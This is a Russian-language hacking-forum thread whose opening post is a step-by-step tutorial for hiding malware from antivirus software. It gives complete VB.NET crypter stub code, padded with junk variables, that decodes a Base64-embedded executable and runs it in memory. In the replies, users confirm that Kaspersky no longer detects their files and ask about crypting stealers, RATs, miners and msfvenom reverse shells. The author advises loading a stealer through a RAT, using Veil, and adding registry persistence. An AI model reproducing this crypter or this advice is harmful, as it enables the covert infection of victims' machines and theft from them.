Статья прячем вредоносный файл (криптовка ехе)

приветствую всех!) В последнее время заметил что у нас не хватает хард-кора как в былые времена) хех, будем исправлять! Представлю Вашему вниманию способ ручной криптовки вредоносного файла на языке visual basic

Открываем visual-studio, создаем новый проект.

и добавляем простой модуль)

и вставляем содержимое:

​

module module1
    Dim KvCNAb As String = "OShsVHguqFKtJCNMyhGvWShHHS"
    Dim NysgqucHukACdAGRVasNmKWRyi As String = "CdmNbayBJHNCsymvsRCHsHgHiMGsBrvjyyBSgitAEC"
    Dim uMHACNOFhOTsgkMcHVBCBCBEmS As String = "gOhBcCNEqSiscNMKbEvBhhggtuhCsMNMVGuMhSBgRH"
    Dim hcrucNgRBktbmGsssjqMsCCgVR As String = "hGgcuyWhAOgNcraAACihSurrAhvNNBSFEHsusABmHVRsasrhCFCkNsaCtTvONchNaMitdNCrBWucFsihBChOsWCusrrdcCHCViVuSusVsF"
    Dim FEiarSHNBVCMHgHamsGVcOcAsGsKWaNgycCyCivCSHdVsskAEiKrbtHvgrhsNBBigEMysdmCBgbigANrrNsAcgVJgh As String = "CEMcNHdkuHrgsHHqjVstNHiCEssbrBWmuNBcFjNuvB"
    Dim server() As Byte = Convert.FromBase64String("")
    Dim HdBcVRNtsHAgbOgsHcgaHCcdsuCSVNaAKRsrVJusNFBsOCFgBisbsAusCC As String = "BuHuWWsgFsHVErcNCuFhBBCtcGAFCugsmTVHjShMVa"
    Dim RagWAVdHCWssBHahvWNVBsSsjk As String = "NjshOGGjgFGcrKGdNrbHcJBFNBHJVTNiRaisgqMcKHBsyCmBVaygANKTuVMugFsSHVNuNVSshCrMHNKBsiHggsFJqA"
    Dim KFbuHBAsCNqmWCFABvvhyTsbMOgVcSNKRsNssVMHsO As String = "VvNNimTSNassaTsMgCgsEvVgNKMMicGMmjsCCkgCWKrKuHCkvddNamiWSE"
    Dim ABbACsSMANihrJWMrqgCTssisCasqVJrjHRKCENCgVgaqqWKguRMEBmAVgVKgNNhrNCargVraC As String = "qiGmsAFVghhCNhCgrdAVCBcgMisHTsdTaShtarshMGvasFtrtOFgBHGTjMNHMCKssiNCNTCrEGJMdrHaahCmagKcVF"
    Dim rMEHHuhATCaWhgdMKCigMRshSW As String = "vdCsBhrsvNNKHsSOJkaNHjCvuWuOsuRGKChFNthTyKHuCadaTAHiGRGaVg"
    Sub Main(ByVal kSsAggcSSuvrqFhWaSOisssyNuiWrNqhFcsEMMcSOHGSMrHujghdErsBhCBRMAHyCGSRVVNSHJHhgMHABsCsdghsaA() As String)
        Dim dCVrmTCBsSVvmiFCCSgNFjBhJsgrKhsCCajHgaCrHcmAsCCEgNAjjGmScChBgHCBBbEgHWBNhW As String = "HuMiaharBVNabhyNrsacNdySbcdqgCHHuMRhArGddEHccgOsFHjuaGBHBsCFVasCFaEvqmTvmy"
        Dim NskNhrHRHciVcduFNShNtuJabS As String = "hHhdCVmTGVEsMMsrHRChsGNjcVhOKMsNSFCVgHsCHgbcmsGSNRijkssahHsBaVhCKhNJMahTSFvciyFsdsaVyBiJSHtAhSgNujcBHVNNyT"
        Dim dargShFSBvmWssmmjTcNBhGugK As String = "icsbBskAAShBCFGgNsrrqCSFbmGNKbNBaHcBhHirhmacsCjuuhRsTNVgThKirjqMthcskEsNrS"
        Dim MghjgFBshWatNMsujrackSROmsiEBGEuVHsAgscaaBFiRgcgVkjvvSyNssORmgmCddgdugsiSNCFsCsCMmiiCBAsFu As String = "NHuNMmtNCJSBavMvHiiFbydAiGaRgdhyHviSBsgHsrsByuSdiiEtuRksAi"
        Dim aNiTEBsNvhdvrqMgOmhKuHySGN As String = "BASTVhdCHsNrJJGNbciSCNdVVBkKBqEVgvJBJhHNHh"
        Dim OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj() As Object = New Object(-1) {}
        Dim ssrVSVcrsCEdHFMgCvsNMmdstC As String = "vCGhhJyhChHGrHHHiSrGChSMMBVNsGdrsidTTiuEdgBBccHuGWCNcFdTjF"
        Dim bBuGrTsSCNCgBjtshONtsFsNvN As String = "MkKrCcaSbrBahGFSkVmsGuFSbFKuRcsFCSsciaiisHsvCKyMhvHMsVssar"
        Dim NsSuiHggNsBbFujEaCKhKasrWs As String = "NNVFAOiutsaVhhscjShiGigHJgHuFcMvhgiHBhyiJs"
        Dim SqSrHGSVBaSagASBruNVRHHtNCHhFFCMgSCTGTtEEBhVtRNcJsFiBsaqTNruNiCaBgTmAdstaRHTHybMyyHGNAOiFimshFiVHBhHsdFgqNhHcsuaVByNjKmSHC As String = "jNWNssacsKGNhhumuHCgththCsNBNcHhOMhCvshNCG"
        Dim hhhNdgNSrsNbrEsRsWBVvSBiRGJFvStMSiHWBqvOCc As String = "hCCucrCEsEJWMyaVbvHKhrvbsmHbNCMWgOiOvCgHAKWkacsCMVKChtsMBsCCqhESuusrssCAVyNCCmtiScNsNdAsrS"
        Dim FdcaOVssNNHsivOSyssdgtCrFS As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(server)
        Dim AkrrvKVMFhqigqABssHCiyRMAHyimiNHhCgrsCsCbaaCvSmdCsSbSsjSyc As String = "iBAOAAEHFHcgBsEOyrsFFqrSAg"
        Dim uhgFskGhmJycHBHdubBmsdSdiNHMBSMrrNrcmisrHbWVurbBSdBaNSmsmVSBdVFBBgatchustV As String = "EsCOcsECiCahBsOsKNharsvyGK"
        Dim aNgBBdsugcauqhsOuvhNKhhHgMCBrCsWHCHBhKaEbg As String = "qiiHBcsAWENihCSkVuSaAkOgac"
        Dim viBhsgtvAhurhhtKyVCsWNGsGOWCCyChrBCagEsshkshyMSsHtaNCrHOvG As String = "OdNVcussGcmVGcgaicCSuBbCss"
        Dim CrgBChgHSsSdAhasHtWEGCcVuMMsNsaCsTHrKyHiNRhSsCThETckjMBGAaCGsqNhVNCGhKsANsvAsmHTcbhNuCFMJrrHHgAhaSBqHvNmNBBssuKdCrmiNKdAkCMVhHsAdhGBqHBKCiMhBsGgvssVNhsFSj As String = "sMHHcSHMNaaqGqHENmuNCHqWJs"
        If FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.GetParameters().Length > 0 Then
            Dim CqhTsSdgFckAuAsjHCVFNrNJrGiVEHdBryTEskGMShJGSHKsyaaHsmWhhEcCkjNdsimggEgCHhgHFcNsVhSrNhsskR As String = "OShsVHguqFKtJCNMyhGvWShHHS"
            Dim igFWqCCdmHVisiScvdCrNbbdtHHSEsNNdNAHBcsJCAABiNGqdcKvqbMRKs As String = "FNHiKuBhAHivFTSsuhVNGCWsghEOsNCmgVSGEONaBG"
            Dim cNsMhgsVhAcTcVCmNCsEsAHihH As String = "NNNaiWGySJsOMjCGKastsHckiGsHstHssCusuGFHGsVsGuBOhEJOMmCCGh"
            Dim gAiBigiScbTOrgdquVtCcSqaJH As String = "hiHVBNrmBdHsmdiTVHcAFiMGyMHMNvsssSmCAsNrCtuBCtCghNmaErHigCHHrTMAHCMhycFuTa"
            Dim SsBMbhhBBvcHgSBNAkuhSmWTGN As String = "aNKKuKahrgAiHGCsgikNhsJHgCKgFuSShjshhSCugHJKthsyqKOTjNHshNhKTOHdViSVvBMgKbhrAghGBThAgGFsga"
            OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj = New Object() {FdcaOVssNNHsivOSyssdgtCrFS}
        End If
        Dim tsSvVhMVicMWumNHNHVMvdCSbr As String = "dScVsEBiNsriajSHWHMhHhHTKFMTdbgBSFsMahGgAacJHAMsSSMrEJENCO"
        Dim CdaHNNbKEcNHghTgsHuSgmaBCN As String = "KWchsNHidsyHHVhssbNBNvcHvbNscvNBcshbSstBCa"
        Dim tsctkishNcEcqtjMCsBbssAhaNvrMgBhNKFkbRBsCNiHiOgBBTvRCNqANHsaKgcrsHvmBFghNRhEuhHuACsjNiyHsV As String = "gCssdHhVBScHRHrVhvgqANgMrgFrAiChcMSkMsCautyFhcihJhcgKNNWsNmRrCCNisGgsBvrgi"
        Dim HsrBTsBEHaSAsCSyWsgGCssgBu As String = "uFVuNcAsdJOdOcBvMhVcMajCAdTsshCiqJqKHjHGCOMGssNsWiuaKAHTqu"
        Dim NshRMVicmAaHTGgHmBCjSuJNtj As String = "HqNNusTcVcChHHBWvtHVqEshscABCsANCrdMsFgKMCssHrrVGvsSvsishmCqBsCqdauVWscsBShaCmRCrKkqThABuCShahHkSumhGhNuHd"
        FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.Invoke(Nothing, OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj)
    End Sub

End Module

далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)

почти все готово, далее идем в свойства нашего нашего будущего ангельского приложения.

ииииииииииии собираем)

далее мы его обфусцируем (сожмем в размере и спрячем код) в прожке

Ссылка скрыта от гостей

и стартуем)


фсйо наша приложенька стала доброй и пушистой, почти)


а вот и хард-кор унизу): все как мы любим!

Good Luck! (гуд-лацк по Русски)


​

 

[Valkiria]

Вот интересно.
Если программу-майнер таким образом закриптовать, то он после таких манипуляций будет работать ?

 

[Ondrik8]

скорее нет) майнеры такая криптовка убивает) это только для ратников идеально подходит...

то есть сначала устанавливаем МЫША, а потом подгружаете Ваш майнер)

 

[[?]]

Данная манипуляция подойдёт только для дотнетовских файлов. Если фай нативный, то работать не будет. На статью мало похоже. Весь смысл ctrl+c and ctrl+v и накрыть протектором. Если уже и писать статью про криптор, то уже хоть, что-то новое внести, а не рассказывать, как накрыть паблик код протектором.

 

[valerian38]

Если уже и писать статью про криптор, то уже хоть, что-то новое внести, а не рассказывать, как накрыть паблик код протектором.

Почему бы это не сделать вам? Было бы очень интересно почитать.

 

[Ondrik8]

Данная манипуляция подойдёт только для дотнетовских файлов. Если фай нативный, то работать не будет. На статью мало похоже. Весь смысл ctrl+c and ctrl+v и накрыть протектором. Если уже и писать статью про криптор, то уже хоть, что-то новое внести, а не рассказывать, как накрыть паблик код протектором.

какая разница паблик не паблик главное скрыть) и паблик софотом можно чудеса делать! Чем плохи дотнетовские трояны? С ними можно такие чудеса проворачивать, не один метасплот и ему подобные не сравнятся, главное все проходит быстро, эфективно и т.д. и для новичко просто и удобно)

 

[[?]]

Что паблик плох разговора не было. Против дотнета против ни чего не имею. Мой комментарий направлен был на то, что в данной статье больше недочетов, чем полезной нагрузки. И название подошло бы лучше с указанием, что крипт дотнета. Если уже и писать, то рассчитывать на более низкие познания читающих и пошаговой описать действия, дать комментарии основным функциям. Негатива в моём посте нет, а только предложение, как сделать то же, но качественней.

 

[Cheburashka]

Попробовал, каспер не палит супер, виртуалку нагнул. Статья супер, спасибо!

 

[MrBa]

Стилер можно криптануть таким способом?

 

[MrBa]

Попробовал - не работает, но АВ не палит))

 

[dramanbase]

Жалко стилер не получаеться "спрятать".

 

[Aha76]

комета и экстрем ломаются... какие ратники точно криптуются кто подскажет?

 

[arthouse]

далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)

Добрый день. Подскажите как это сделать?

 

[Contror]

никто не знает в чем проблема? при обфускации выдает вот это

 

[Tihon49]

Msfvenom payload (reverse_tcp) можно таким образом "криптануть"?

 

[legendofkiller]

скорее нет) майнеры такая криптовка убивает) это только для ратников идеально подходит...

то есть сначала устанавливаем МЫША, а потом подгружаете Ваш майнер)

Хей, я не тебе случаем Wi-Fi Pineapple толкнул?)

 

[LuckyNOOB]

Хмм а кто знает, как сделать самоудаление после исполнение файла?

 

[Ondrik8]

Стилер можно криптануть таким способом?

если он нативный то, да! но лучше ратник как в теме потом с него стилак прогрузить!

Msfvenom payload (reverse_tcp) можно таким образом "криптануть"?

нет, для венома есть VEIL он не плохо справляется!

Хей, я не тебе случаем Wi-Fi Pineapple толкнул?)

да! мне)

Хмм а кто знает, как сделать самоудаление после исполнение файла?

смысл тогда заражать?), лучше его спрятать и пропсать в реестре для закрепления в системе!

 

[LuckyNOOB]

смысл тогда заражать?), лучше его спрятать и пропсать в реестре для закрепления в системе!

Все зависит от типа вируса. Не всем им надо закрепляться в системе)

 

[Tihon49]

Все зависит от типа вируса. Не всем им надо закрепляться в системе)

Стиллером балуешься? Что сейчас актуально из приватных?